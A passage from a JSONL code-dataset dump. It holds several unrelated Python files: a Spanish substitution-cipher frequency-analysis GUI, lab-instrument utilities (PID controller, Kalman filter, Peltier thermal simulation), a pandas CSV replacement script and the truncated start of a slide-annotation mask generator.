self.pantalla.mainloop()\r\n\r\n def mostrarBotonActualizar(self):\r\n self.btnActualizarTexto.place(x=500, y=40)\r\n\r\n def cargarTexto(self):\r\n if self.validarTxtEntradaTexto():\r\n try:\r\n rutaTXT = self.rutaPY + \"\\\\\" + str(self.txtNombreTXT.get()) + \".txt\"\r\n blockDeNotas = open(rutaTXT, \"r\", encoding=\"UTF-8\")\r\n self.textoEncriptado = blockDeNotas.read()\r\n self.mostrarTextoEncriptado()\r\n blockDeNotas.close()\r\n self.mostrarBotonActualizar()\r\n self.textoCargadoExitosamente = True\r\n except:\r\n self.mostrarVentanaEmergente(\"Error Fatal\", \"No se puede abrir el archivo...\"+str(self.txtNombreTXT.get()))\r\n else:\r\n self.mostrarVentanaEmergente(\"Error Fatal...\", \"Se necesita introducir el nombre del txt sin la extensión\")\r\n\r\n\r\n def mostrarTextoEncriptado(self):\r\n self.txtTextoBruto.delete(\"1.0\", END)\r\n self.txtTextoBruto.insert(\"1.0\", self.textoEncriptado)\r\n self.actualizarEstadisticas()\r\n\r\n def actualizarEstadisticas(self):\r\n txt = \"%Porcentaje de Aparición de Caracteres%\\n\\n\"\r\n totalDeCaracteresDelTexto = len(self.textoEncriptado)\r\n \r\n\r\n estadisticaCaracteres = {}\r\n\r\n for i in self.textoEncriptado:\r\n if i in estadisticaCaracteres:\r\n estadisticaCaracteres[i] = estadisticaCaracteres[i] + 1 \r\n else:\r\n estadisticaCaracteres[i] = 1\r\n\r\n txt = txt + \"Total caracteres: \" + str(len(estadisticaCaracteres)) + \"\\n\\n\"\r\n\r\n porcentajeCaracteres = []\r\n\r\n\r\n for i in estadisticaCaracteres:\r\n porcentaje = (estadisticaCaracteres[i]/totalDeCaracteresDelTexto)*100\r\n porcentaje = round(porcentaje, 4)\r\n porcentajeCaracteres.append((i, porcentaje))\r\n\r\n # Organizar por burbuja\r\n # CopiarElVector\r\n copyPor = []\r\n for i in porcentajeCaracteres:\r\n copyPor.append(i)\r\n\r\n temp = None\r\n for i in range(0, len(copyPor)-1):\r\n for j in range(0, len(copyPor)-i-1):\r\n if copyPor[j][1] < copyPor[j+1][1]:\r\n temp = copyPor[j]\r\n copyPor[j] = copyPor[j+1]\r\n copyPor[j+1] = temp\r\n\r\n info = \"\"\r\n contador = 0\r\n for i in copyPor:\r\n if contador == 2:\r\n info = info + \"\\n\"\r\n contador = 0\r\n\r\n info = info + \"[\" + str(i[0]) + \"] =>\" + 
str(i[1]) + \"%\" + \" -- \"\r\n contador = contador + 1\r\n\r\n txt = txt + info\r\n\r\n self.bannerPorcentaje['text'] = txt\r\n\r\n\r\n def reemplazarEnTextoAB(self):\r\n if self.textoCargadoExitosamente:\r\n if self.validarReemplazoTextoA():\r\n # Se reemplaza y se guarda en el temporal \r\n self.textoTemporal = self.textoEncriptado.replace(self.txtReemplazarA.get(), self.txtReemplazarB.get())\r\n # Semuestra \r\n self.mostrarVentanaEmergente(\"Reemplazando : \"+self.txtReemplazarA.get()+\" -> \"+self.txtReemplazarB.get(), self.textoTemporal)\r\n\r\n\r\n\r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"para reemplzar un texto debe de introducir un patron inicial\")\r\n else:\r\n self.mostrarVentanaEmergente(\"Error fatal... \", \"Primero se debe de cargar un texto\")\r\n\r\n def verPalabrasSiElEspacioEsA(self):\r\n if self.textoCargadoExitosamente:\r\n if self.validarVerPalabrasSiElEspacioEs():\r\n palabras = self.textoEncriptado.split(self.txtVerPalabrasSiElEspacioEs.get())\r\n\r\n\r\n txt = \"\" # Mensaje pricipal\r\n br = \"---------------------------------\\n\" # Salto de linea bonito\r\n\r\n for i in palabras:\r\n txt = txt + \"\\n\" + i\r\n\r\n # Se pone el titulo y se muestran las posibles palabras\r\n txt = \"Estas son todas las posibles palabras si el espacio es: \" + \"/\" + self.txtVerPalabrasSiElEspacioEs.get() + \"/\" + \"\\n\" + txt\r\n\r\n txt = br + txt + br\r\n\r\n # Se muestran las estadisticas\r\n\r\n txt = txt + \"Posibles palabras: \" + str(len(palabras)) + \"\\n\" + br\r\n \r\n # Se muestran las coincidencias de palabras\r\n\r\n coincidencias = {}\r\n\r\n for i in palabras:\r\n if i in coincidencias:\r\n coincidencias[i] = coincidencias[i] + 1\r\n else:\r\n coincidencias[i] = 1\r\n\r\n # Se ordenan mediante burbuja\r\n # Organizar por burbuja\r\n # CopiarElVector\r\n copyPor = []\r\n for i in coincidencias:\r\n copyPor.append((i, coincidencias[i]))\r\n\r\n temp = None\r\n for i in range(0, len(copyPor)-1):\r\n for j in range(0, len(copyPor)-i-1):\r\n if copyPor[j][1] < copyPor[j+1][1]:\r\n temp = copyPor[j]\r\n copyPor[j] = copyPor[j+1]\r\n copyPor[j+1] = temp\r\n\r\n\r\n cantidadDePalabras = \"\"\r\n for i in copyPor:\r\n cantidadDePalabras = cantidadDePalabras + i[0] + \" => \" + str(i[1]) + \"\\n\"\r\n \r\n\r\n txt = txt + cantidadDePalabras\r\n\r\n\r\n self.mostrarVentanaEmergente(\"Si el espacio es... 
+ /\" + self.txtVerPalabrasSiElEspacioEs.get(), txt)\r\n\r\n\r\n\r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"Introduzca un patrón ó caracter para ver si el espacio es...\")\r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"Para realizar la acción de espaciado cargue un texto\")\r\n\r\n def verCantidadDeCoindicenciasDePatron(self):\r\n if self.textoCargadoExitosamente:\r\n if self.validarPatronDeCoincidencia():\r\n\r\n patron = self.txtVerCuantasVecesApareceUnPatron.get() # Este es el patron que se esta buscndo\r\n longitudPatron = len(patron) # Que tan largo es el patron\r\n\r\n # Variables inforamtivas\r\n cuantasVecesApareceElPatron = 0\r\n\r\n\r\n contador = 0 # Para recorrer el texto encriptado\r\n limite = len(self.textoEncriptado)/longitudPatron # Para recorrer el texto encriptado\r\n while contador < limite:\r\n parteTextoEnciptado = self.textoEncriptado[contador:contador+longitudPatron]\r\n\r\n if patron == parteTextoEnciptado:\r\n cuantasVecesApareceElPatron = cuantasVecesApareceElPatron + 1\r\n\r\n contador = contador + longitudPatron\r\n\r\n\r\n # Se Hace el repote:\r\n txt = \"El patron: \" + patron + \" aparece un total de: \" + str(cuantasVecesApareceElPatron)\r\n\r\n self.mostrarVentanaEmergente(\"El patron aparece: \", txt) \r\n\r\n\r\n \r\n \r\n\r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"Se necesita ingresar un patrón de busqueda\")\r\n \r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"Para ver cuantas veces aparece el patrón cargue el texto\")\r\n\r\n\r\n\r\n def actualizartexto(self):\r\n self.txtTextoBruto.delete(\"1.0\", END)\r\n self.textoEncriptado = self.textoTemporal\r\n self.txtTextoBruto.insert(\"1.0\", self.textoEncriptado)\r\n self.actualizarEstadisticas()\r\n\r\n\r\n def mostrarVentanaEmergente(self, titulo, texto):\r\n ventanita = Toplevel()\r\n ventanita.geometry(\"800x600\")\r\n ventanita.title(titulo)\r\n tela = Canvas(ventanita, width=800, height=600)\r\n tela.place(x=0, y=0)\r\n txt = Text(tela, width=96, height=35)\r\n txt.insert(\"1.0\", texto)\r\n txt.place(x=10, y=10)\r\n\r\n def mostrarInstrucciones(self):\r\n titulo = \"Instrucciones para Retrasados Mentales\"\r\n\r\n texto = \"\"\"\r\n\r\nEste es el programa de desencriptado por sustitución del loko 2021\r\n\r\n1 -> tiene que cargar el archivo.txt :\r\n Asegurece de tener el archivo.txt luego copie el nombre del archivo sin la extensión .txt \r\n\r\n2 -> Si el archivo cargo correctamente se mostrará en pantalla con las estadisticas de caracteres \r\n\r\n3 -> Para hacer el reemplazo de caracteres:\r\n\r\n * Si desea reemplazar un caracter o conjunto de caracteres introduzcalos en la casilla A y será \r\n reemplazado por lo de la casilla B\r\n\r\n * Si desea eliminar los espacios en blanco: ingrese un espacio en blanco en la casilla A y nada en \r\n la casilla B\r\n\r\n //Una vez reemplado proceda a actualizar el texto para dejarlo en ese estado.\r\n\r\n4 -> Si ud supone que el espacio es el caracter ó patrón ... 
introduzcalo y este le mostrara como serian las posibles palabras.\r\n\r\n\r\nhttps://github.com/felipedelosh/descodificadorPorSustitucion/blob/main/Decriptor%20by%20loko.pdf\r\n\r\n \"\"\"\r\n\r\n self.mostrarVentanaEmergente(titulo, texto)\r\n\r\n def validarTxtEntradaTexto(self):\r\n return str(self.txtNombreTXT.get()).strip() != \"\"\r\n\r\n def validarReemplazoTextoA(self):\r\n return str(self.txtReemplazarA.get()) != \"\"\r\n\r\n def validarVerPalabrasSiElEspacioEs(self):\r\n return str(self.txtVerPalabrasSiElEspacioEs.get()) != \"\"\r\n\r\n def validarPatronDeCoincidencia(self):\r\n return str(self.txtVerCuantasVecesApareceUnPatron.get()).strip() != \"\"\r\n \r\n\r\n\r\nd = Decriptor()","repo_name":"felipedelosh/descodificadorPorSustitucion","sub_path":"decriptorLoko.py","file_name":"decriptorLoko.py","file_ext":"py","file_size_in_byte":12916,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26337320630","text":"import math\nimport numpy as np\nimport csv\nimport time\nfrom multiprocessing import Event\n\ndef QuantizeReading(reading, fraction_resolution_denominator):\n\treal_value = reading\n\ttry:\n\t\tmeasured_value = round(real_value * float(fraction_resolution_denominator)) / int(fraction_resolution_denominator)\n\texcept:\n\t\tprint(reading, fraction_resolution_denominator)\n\treturn measured_value\n\ndef AddNoise(reading, standard_deviation):\n\timport numpy as np\n\treal_value = reading\n\tnoise = np.random.normal(real_value, standard_deviation)\n\treturn noise\n\ndef PolynomialCorrection(measured_value, coefficients):\n\t# Apply a polynomial correction to a measured value.\n\t# Order of polynomial function is determined according to the number of coefficients.\n\t# Polynomial of form y = Ax^2 + Bx + C, coefficients of the form [A, B, C]. 
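\n\t# Illustrative check (values not from the source): with coefficients [2.0, 3.0, 1.0]\n\t# the loop below evaluates 2*x**2 + 3*x + 1, so PolynomialCorrection(2.0, [2.0, 3.0, 1.0]) returns 15.0.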
\n\tcorrected_value = 0.0\n\tif len(coefficients) > 0:\n\t\tfor term in range((len(coefficients))):\n\t\t\tvalue = (coefficients[term] * pow(measured_value, ((len(coefficients) - 1) - term)))\n\t\t\tcorrected_value += value\n\treturn corrected_value\n\nclass DriftFreeTimer():\n\tdef __init__ (self, signal_thread_event, kill_thread_event, interval_msecs):\n\t\t# Drift compensating timer.\n\t\tnext_call = time.time()\n\t\twhile kill_thread_event.wait(0.01):\n\t\t\tnext_call = next_call + interval_msecs\n\t\t\tsleep_duration = next_call - time.time()\n\t\t\tif sleep_duration < 0.0:\n\t\t\t\tsleep_duration = 0.0\n\t\t\ttime.sleep(sleep_duration)\n\t\t\tsignal_thread_event.set()\n\n\nclass PIDController():\n\tdef __init__(self, device_parameter_defaults, time_step, pid_coeffs, drive_mode):\n\t\tself.device_parameter_defaults = device_parameter_defaults\n\t\tself.time_step = float(time_step)\n\t\tself.drive_mode = drive_mode\n\t\tself.SetCoeffs(pid_coeffs)\n\n\tdef SetCoeffs(self, pid_coeffs):\n\t\tself.P = pid_coeffs['P']\n\t\tself.I = pid_coeffs['I']\n\t\tself.D = pid_coeffs['D']\n\t\tself.power_multiplier = pid_coeffs['power_multiplier']\n\t\n\tdef Initialise(self, current_temp, setpoint):\n\t\tself.current_temp = current_temp\n\t\tself.setpoint = setpoint\n\t\tself.error = self.current_temp - self.setpoint\n\t\tself.integral_error = 0.0\n\t\tself.output = 0.0\n\n\tdef Update(self, measurement):\n\t\terror = float(measurement) - self.setpoint\n\t\tself.delta_error = error - self.error\n\t\tself.error = error\n\t\tself.integral_error += (self.error * self.time_step) \n\t\t\n\t\t# Peltier module is not a symetrically bi-directional heat pump as waste heat is always emitted from the 'hot' side.\n\t\t# Therefore, due to it's low efficiency Peltier module is ~3-5 times more powerful as a heater than as a cooler.\n\t\t# For this reason, if we are in 'heating' mode (ie, negative throttle position) we need to correspondingly re-scale\n\t\t# our control coefficients.\n\t\tif self.output >= 0.0:\n\t\t\tP, I, D = (self.P, self.I, self.D)\n\t\telse:\n\t\t\tP, I, D = (self.P / self.power_multiplier, self.I / self.power_multiplier, self.D / self.power_multiplier)\n\t\tself.delta_output = (P * self.error) + (I * self.integral_error) + (D * self.delta_error * (1.0 / self.time_step))\n\t\tself.output += self.delta_output\n\n\t\t# ~self.integral_error += (self.error * self.time_step)\n\t\t# ~if (self.I * self.integral_error) > 100.0:\n\t\t\t# ~self.integral_error = 100.0 / self.I\n\t\t# ~elif (self.I *self.integral_error) < -100.0:\n\t\t\t# ~self.integral_error = -100.0 / self.I\n\t\t# ~self.delta_output = (self.P * self.error) + (self.I * self.integral_error) + (self.D * self.delta_error * (1.0 / self.time_step))\n\t\t# ~self.output = self.delta_output\n\t\t\n\t\t# Apply Peltier drive limits.\n\t\tif self.drive_mode == 1:\n\t\t\t# Heating only mode...\n\t\t\tif self.output > 0.0:\n\t\t\t\tself.output = 0.0\n\t\t\tif self.output < -100.0:\n\t\t\t\tself.output = -100.0\n\t\telif self.drive_mode == 2:\n\t\t\t# Heating/Cooling mode...\n\t\t\tif self.output > 100.0:\n\t\t\t\tself.output = 100.0\n\t\t\tif self.output < -100.0:\n\t\t\t\tself.output = -100.0\n\t\telif self.drive_mode == 3:\n\t\t\t# Cooling only mode...\n\t\t\tif self.output > 100.0:\n\t\t\t\tself.output = 100.0\n\t\t\tif self.output < 0.0:\n\t\t\t\tself.output = 0.0\n\t\treturn round(self.output, 3)\n\nclass Fluid():\n\tproperties = {}\n\tdef __init__(self, name, data_file, bulk_temperature):\n\t\tself.name = name\n\t\tself.data_file = 
data_file\n\t\tself.bulk_temperature = bulk_temperature\n\t\tvalues = []\n\t\twith open(self.data_file, 'r') as csvfile:\n\t\t\tspamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n\t\t\tfor i, row in enumerate(spamreader):\n\t\t\t\tif i == 0:\n\t\t\t\t\tcolumns = [[str(j)] for i, j in enumerate(row)]\n\t\t\t\telif i == 1:\n\t\t\t\t\tfor j, k in enumerate(row):\n\t\t\t\t\t\tcolumns[j].append(str(k))\n\t\t\t\telse:\n\t\t\t\t\tfor j, k in enumerate(row):\n\t\t\t\t\t\tcolumns[j].append(float(k))\n\t\t\tfor i in columns:\n\t\t\t\tself.properties[i[0]] = {}\n\t\t\t\tself.properties[i[0]]['units'] = i[1]\n\t\t\t\tself.properties[i[0]]['values'] = i[2:]\n\t\t\t\tif i[0] != 'Temperature':\n\t\t\t\t\tself.properties[i[0]]['fit_order'] = 3\n\t\t\t\t\tself.properties[i[0]]['fit_coeffs'] = np.polyfit(self.properties['Temperature']['values'], self.properties[i[0]]['values'], 2)\n\tdef GetProperties(self, temperature, property_name):\n\t\treturn np.polyval(self.properties[property_name]['fit_coeffs'], temperature)\n\nclass PeltierCooler():\n\tdef __init__(self, device_parameter_defaults, max_cooling_power, heatsink_temperature, number_of_elements, element_width, element_length, element_thermal_conductivity):\n\t\tself.device_parameter_defaults = device_parameter_defaults\n\t\tself.heatsink_temperature = heatsink_temperature\n\t\tself.heatsink_timestamp = 0.0\n\t\tself.number_of_elements = number_of_elements\n\t\tself.element_width = element_width\n\t\tself.element_length = element_length\n\t\tself.element_thermal_conductivity = element_thermal_conductivity\n\t\tself.throttle_percent = 0\n\t\tself.maximum_cooling_power = max_cooling_power\n\t\tself.current_cooling_power = 0.0\n\n\tdef ConductiveHeatTransfer(self, delta_t):\n\t\treturn self.number_of_elements * (self.element_thermal_conductivity * (self.element_width ** 2) * (delta_t / self.element_length))\n\n\tdef SetThrottle(self, throttle_percent):\n\t\tself.throttle_percent = float(throttle_percent)\n\t\tif self.throttle_percent >= 0.0:\n\t\t\t# We are 'cooling', power as normal.\n\t\t\tpumping_power = self.maximum_cooling_power\n\t\telse:\n\t\t\t# We are 'heating', power is increased to account for waste heat output.\n\t\t\tpumping_power = self.maximum_cooling_power * self.device_parameter_defaults['simulation_peltier_power_ratio']\n\t\tself.current_cooling_power = float((pumping_power / 100.0) * self.throttle_percent)\n\n\tdef GetHeatSinkTemperature(self, time_period):\n\t\tif self.device_parameter_defaults['simulation_hsk_temp_variation_active'] == True:\n\t\t\tself.heatsink_timestamp += time_period\n\t\t\theatsink_temperature = self.heatsink_temperature + (self.device_parameter_defaults['simulation_hsk_temp_variation_amplitude'] * np.sin(self.heatsink_timestamp * ((2 * np.pi) / self.device_parameter_defaults['simulation_hsk_temp_variation_period'])))\n\t\telse:\n\t\t\theatsink_temperature = self.heatsink_temperature\n\t\treturn heatsink_temperature\n\nclass CooledObject():\n\tdef __init__(self, device_parameter_defaults, temperature, edge_length, thickness, density, specific_heat_capacity):\n\t\tself.device_parameter_defaults = device_parameter_defaults\n\t\tself.temperature = temperature\n\t\tself.edge_length = float(edge_length)\n\t\tself.thickness = float(thickness)\n\t\tself.density = float(density)\n\t\tself.specific_heat_capacity = float(specific_heat_capacity)\n\t\tself.volume = np.power(edge_length, 2.0) * thickness\n\t\tself.mass = self.volume * self.density\n\t\tself.cooled_area = np.power(edge_length, 
2.0)\n\t\tself.length_parameter = self.cooled_area / (self.edge_length * 4.0)\n\t\tself.conductive_heat_transfer = 0.0\n\t\tself.temperature_change_rate = 0.0\n\n\tdef ConvectiveHeatTransfer(self, fluid, delta_t):\n\t\tboundary_temperature = fluid.bulk_temperature + delta_t\n\t\tfilm_temperature = (fluid.bulk_temperature + boundary_temperature) / 2.0\n\t\tdensity = fluid.GetProperties(film_temperature, 'Density')\n\t\tthermal_expansion_coefficient = 1.0 / film_temperature\n\t\tdynamic_viscosity = fluid.GetProperties(film_temperature, 'DynamicViscosity') * 1e-5\n\t\tgrashof_number = (np.power(self.length_parameter, 3.0) * np.power(density, 2.0) * 9.81 * (-1.0*delta_t) * thermal_expansion_coefficient) / (dynamic_viscosity ** 2.0)\n\t\tprandtl_number = fluid.GetProperties(film_temperature, 'Prandtl\\'sNumber')\n\t\trayleigh_number = grashof_number * prandtl_number\n\t\t# We can't take a fractional power of a negative number with np.power(). \n\t\t# This solution taken from https://stackoverflow.com/a/45384691\n\t\tnusselt_number = 0.27 * (np.sign(rayleigh_number) * (np.abs(rayleigh_number)) ** 0.25)\n\t\tcoefficient_of_convective_heat_transfer = (nusselt_number * (fluid.GetProperties(film_temperature, 'ThermalConductivity') * 1e-2)) / self.length_parameter\n\t\theat_transfer_rate = coefficient_of_convective_heat_transfer * self.cooled_area * delta_t\n\t\treturn {'Rayleigh Number' : rayleigh_number, 'Convective Heat Transfer Coefficient' : coefficient_of_convective_heat_transfer, 'Heat Transfer Rate' : heat_transfer_rate}\n\n\tdef UpdateTemperature(self, fluid, peltier_cooler, integration_time, sub_time_steps):\n\t\tintegration_time = float(integration_time)\n\t\tsub_time_step = integration_time / float(sub_time_steps)\n\t\tsub_time = 0.0\n\t\tself.sub_times = []\n\t\tself.sub_temperatures = []\n\t\tself.sub_rates = []\n\t\thst = 0.0\n\t\tfor i in range(sub_time_steps):\n\t\t\tself.sub_times.append(sub_time)\n\t\t\tself.sub_temperatures.append(self.temperature)\n\t\t\t# ~heatsink_object_delta_t = self.temperature - peltier_cooler.heatsink_temperature\n\t\t\theatsink_temperature = peltier_cooler.GetHeatSinkTemperature(sub_time_step)\n\t\t\thst = heatsink_temperature\n\t\t\theatsink_object_delta_t = self.temperature - heatsink_temperature\n\t\t\tbulk_fluid_object_delta_t = self.temperature - fluid.bulk_temperature\n\t\t\tconductive_heat_transfer = peltier_cooler.ConductiveHeatTransfer(heatsink_object_delta_t)\n\t\t\tconvective_heat_transfer = self.ConvectiveHeatTransfer(fluid, bulk_fluid_object_delta_t)\n\t\t\t# Multiply overall rate by -1 as we are actually calculating flow INTO the object\n\t\t\tnet_heat_transfer_rate = (conductive_heat_transfer + convective_heat_transfer['Heat Transfer Rate'] + peltier_cooler.current_cooling_power) * -1.0\n\t\t\tdelta_t = ((net_heat_transfer_rate * sub_time_step) / (self.specific_heat_capacity)) * (1.0 / self.mass)\n\t\t\tself.temperature_change_rate = delta_t\n\t\t\tself.temperature += delta_t\n\t\t\tself.sub_rates.append((delta_t * (1.0 / (integration_time / float(sub_time_steps)))))\n\t\t\tsub_time += (integration_time / float(sub_time_steps))\n\t\tif self.device_parameter_defaults['simulation_display_hsk_temp'] == True:\n\t\t\tprint(hst - 273.15)\n\t\treturn self.temperature\n\nclass KalmanFilter():\n\tdef __init__(self, name, time_step, x0, F, q, p0, H, R):\n\t\tself.name = name\n\t\tself.time_step = time_step\n\t\tself.x0 = np.matrix(x0)\n\t\tself.F = np.matrix(F)\n\t\tself.Q = np.matrix([[q, 0.0], [0.0, q]])\n\t\tself.p0 = np.matrix(p0)\n\t\tself.H = 
np.matrix(H)\n\t\tself.R = np.matrix(R)\n\t\tself.B = np.matrix([[0.0], [0.0]])\n\tdef Predict(self):\n\t\tself.x1 = (self.F * self.x0) + self.B\n\t\tself.p1 = ((self.F * self.p0) * np.transpose(self.F)) + self.Q\n\tdef Update(self, measurement):\n\t\ty = np.matrix(np.array([[measurement], [0.0]]))\n\t\tz = y - (self.H * self.x1)\n\t\tS = self.H * self.p1 * np.transpose(self.H) + self.R\n\t\tK = self.p1 * np.transpose(self.H) * (S ** -1)\n\t\tself.x2 = self.x1 + (K * z)\n\t\tself.p2 = (np.eye(2) - (K * self.H)) * self.p1\n\t\tself.x0 = self.x2\n\t\tself.p0 = self.p2\n\nclass TimingMonitor():\n\tdef __init__(self, channel_id, mq_timestamp, event_kill):\n\t\tself.mq_timestamp = mq_timestamp\n\t\tself.event_kill = event_kill\n\t\tself.channel_id = channel_id\n\t\tself.current_timestamps = []\n\t\t\n\t\tprint(\"Timing monitor ready.\")\n\t\twhile True:\n\t\t\tif not self.event_kill.is_set():\n\t\t\t\tbreak\n\t\t\ttry:\n\t\t\t\tmost_recent_timestamp = self.mq_timestamp.get(False, timeout = None)\n\t\t\t\tif most_recent_timestamp[0] == 0:\n\t\t\t\t\tself.normalised_timestamps = [[j[0], round(j[1] - self.current_timestamps[0][1], 4)] for i, j in enumerate(self.current_timestamps)]\n\t\t\t\t\tprint('Channel ' + str(self.channel_id) + ': ', self.normalised_timestamps)\n\t\t\t\t\tself.current_timestamps = []\n\t\t\t\telse:\n\t\t\t\t\tself.current_timestamps.append(most_recent_timestamp)\n\t\t\texcept:\n\t\t\t\tpass\n\t\t# Flush timestamp message queue in readiness for shutdown. If we end this process with items still on the input\n\t\t# queue, attempts to join this process will block indefinitely.\n\t\twhile self.mq_timestamp.qsize() > 0:\n\t\t\ttry:\n\t\t\t\tmost_recent_timestamp = self.mq_timestamp.get(False, None)\n\t\t\texcept:\n\t\t\t\tpass\n\t\tprint(\"Timing monitor shut down.\")\n\ndef TruncateFloat(number, digits) -> float:\n\tstepper = 10.0 ** digits\n\treturn math.trunc(stepper * number) / stepper\n","repo_name":"sikora-scientific-instrumentation/cold_stage_4","sub_path":"Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":12517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32624006466","text":"import pandas as pd\nimport sys\nimport glob\nfrom src.settings import *\n\n\ndef getReplace(org, key, before, after):\n\torg[key] = org[key].str.replace(before, after)\n\treturn org\n\ndef replacePrice(org, key, down, up, a, b):\n\t# Linearly rescale (y = a*x + b) the rows whose value falls in the assumed range [down, up];\n\t# e.g. replacePrice(df, 'price', 1000, 2000, 2, 500) maps prices in that band to 2*x + 500.\n\tmask = (org[key] >= down) & (org[key] <= up)\n\torg.loc[mask, key] = org.loc[mask, key] * a + b\n\treturn org\n\ndef readReplace(init, path_replce, key, orgData, replaced_csv_path):\n\n\n\twith open(path_replce, 'r', encoding='Shift-JIS') as f:\n\t\tfor line in f:\n\t\t\t## remove 'Newline character'\n\t\t\tline = line.strip().split(',')\n\t\t\tprint(len(line), line)\n\t\t\tif(key != \"price\"):\n\t\t\t\tif( len(line) == 2):\n\t\t\t\t\t## Before conversion and After conversion\n\t\t\t\t\tbefore = line[0]\n\t\t\t\t\t#after = '{0}({1})'.format(line[0], line[1])\n\t\t\t\t\tafter = line[1]\n\n\t\t\t\t\tnewData = getReplace(orgData, key, before, after)\n\t\t\t\t\t## Overwrite mode\n\t\t\t\t\tnewData.to_csv(replaced_csv_path, encoding='Shift-JIS', index=False)\n\t\t\telse:\n\t\t\t\tif( len(line) == 4):\n\t\t\t\t\t## down, up, a, b\n\t\t\t\t\tnewData = replacePrice(orgData, key, int(line[0]), int(line[1]), int(line[2]), int(line[3]))\n\t\t\t\t\t## Overwrite mode\n\t\t\t\t\tnewData.to_csv(replaced_csv_path, encoding='Shift-JIS', index=False)\n\ndef runHeader(init, pathReplceList, 
headers):\n\t#test\n\treplaced_csv_path = '../{0}_csv/replaced_{1}'.format(init['folder'], init['csv_name'])\n\torg_csv_path = '../{0}_csv/{1}'.format(init['folder'], init['csv_name'])\n\t# Load the source CSV up front; the loop below passes 'orgData' to readReplace().\n\torgData = pd.read_csv(org_csv_path, encoding='Shift-JIS')\n\n\t# replaced_csv_path = '{0}_csv/replaced_{1}'.format(init['folder'], init['csv_name'])\n\t# org_csv_path = '{0}_csv/{1}'.format(init['folder'], init['csv_name'])\n\n\tfor head, path_replce in zip(headers, pathReplceList):\n\t\treadReplace(init, path_replce, head, orgData, replaced_csv_path)\n\ndef replaceName(org_data, df_replace):\n\tcopy_data = org_data.copy()\n\tfor i, d in enumerate(org_data['name']):\n\t\tadd_str = ''\n\t\tfor a, b in zip(df_replace['name_after'], df_replace['name_before']):\n\t\t\tif(str(b) in str(d)):\n\t\t\t\tadd_str += str(a) + ' '\n\t\tcopy_data['name'][i] = '[{}]'.format(add_str) + str(org_data['name'][i])\n\n\treturn copy_data\n\ndef replaceMaterial(org_data, df_replace):\n\tfor i, d in enumerate(org_data['Material']):\n\t\tadd_str = ''\n\t\tfor a, b in zip(df_replace['Material_after'], df_replace['Material_before']):\n\t\t\tif(str(b) in str(d)):\n\t\t\t\t# Update only the matching row (per-row assignment, mirroring replaceName).\n\t\t\t\torg_data['Material'][i] = a\n\t\t\t\tbreak\n\n\treturn org_data\n\ndef runCsvList(init, pathReplceList, headers):\n\t#df_replace = pd.read_csv('replace_list.csv', encoding='Shift-JIS')\n\tdf_replace = pd.read_csv('replace_csv/replace_list.csv', encoding='Shift-JIS')\n\n\treplaced_csv_path = '{0}_csv/replaced_{1}'.format(init['folder'], init['csv_name'])\n\torg_csv_path = '{0}_csv/{1}'.format(init['folder'], init['csv_name'])\n\torg_data = pd.read_csv(org_csv_path, encoding='Shift-JIS', dtype = 'object')\n\n\tfor i in headers:\n\t\tif(i == 'name'):\n\t\t\torg_data = replaceName(org_data, df_replace)\n\t\tif(i == 'Material'):\n\t\t\torg_data = replaceMaterial(org_data, df_replace)\n\n\torg_data.to_csv(replaced_csv_path, encoding='Shift-JIS', index=False)\n\nif __name__ == '__main__':\n\tinit = setConst()\n\theaders = ['name', 'Material']\n\tpathReplceList = 0\n\trunCsvList(init, pathReplceList, headers)\n","repo_name":"kaiadachi/project_backcountry","sub_path":"src/toolReplace.py","file_name":"toolReplace.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74753809765","text":"import xml.etree.ElementTree as ET\nimport cv2\nimport numpy as np\nfrom time import perf_counter\nfrom functools import wraps\nimport os\nimport sys\nsys.path.append(r'../')\nfrom config import config\n\ndtype_to_format = {\n    'uint8': 'uchar',\n    'int8': 'char',\n    'uint16': 'ushort',\n    'int16': 'short',\n    'uint32': 'uint',\n    'int32': 'int',\n    'float32': 'float',\n    'float64': 'double',\n    'complex64': 'complex',\n    'complex128': 'dpcomplex',\n}\n\ndef timer(function):\n    @wraps(function)\n    def new_function(*args, **kwargs):\n        start_time = perf_counter()\n        result = function(*args, **kwargs)  # forward keyword arguments to the wrapped function as well\n        elapsed = perf_counter() - start_time\n        print('Function \"{name}\" took {time} seconds to complete.'.format(\n            name=function.__name__, time=elapsed))\n        return result\n\n    return new_function\n\n\ndef numpy2vips(a):\n    height, width = a.shape\n    linear = a.reshape(width * height * 1)\n    vi = pyvips.Image.new_from_memory(linear.data, width, height, 1,\n                                      dtype_to_format[str(a.dtype)])\n    return vi\n\n\ndef color_group(mask, xml_root, group_name, color=255):\n    coordinates = xml_root.findall(\n        \".//Annotation[@PartOfGroup='{}']/Coordinates\".format(group_name))\n\n    for regions in coordinates:\n        points = []\n        for region in 
regions:\n            x = float(region.attrib['X'])\n            y = float(region.attrib['Y'])\n            points.append([x, y])\n        if len(points):\n            pts = np.asarray([points], dtype=np.int32)\n            cv2.fillPoly(mask, pts, color=color)\n\n    return mask\n\n\n@timer\ndef genMask(slide_path, xml_path, save_mask_path):\n    slide = pyvips.Image.new_from_file(slide_path)\n    mask = np.zeros((slide.height, slide.width), dtype=np.uint8)\n\n    xml_root = ET.parse(xml_path)\n    mask = color_group(mask, xml_root, 'tumor', 255)\n    mask = color_group(mask, xml_root, 'normal', 0)\n    vips_img = numpy2vips(mask)\n    vips_img.tiffsave(save_mask_path, compression='deflate', tile=True,\n                      bigtiff=True, pyramid=True, miniswhite=False, squash=False)\n\n\nif __name__ == '__main__':\n    import pyvips\n    # python gen_mask.py name.mrxs\n    slide_name = sys.argv[1]\n    uuid = slide_name.split('.')[0]\n    slide_path = config[\"wsi_root_path\"] + f\"/{slide_name}.tif\"\n    xml_path = config[\"preprocess_save_path\"] + f\"/{uuid}/{uuid}_result.xml\"\n    save_mask_path = config[\"preprocess_save_path\"] + f\"/{uuid}/{uuid}_result.tiff\"\n    print('[INFO] start converting '+uuid+' annotation 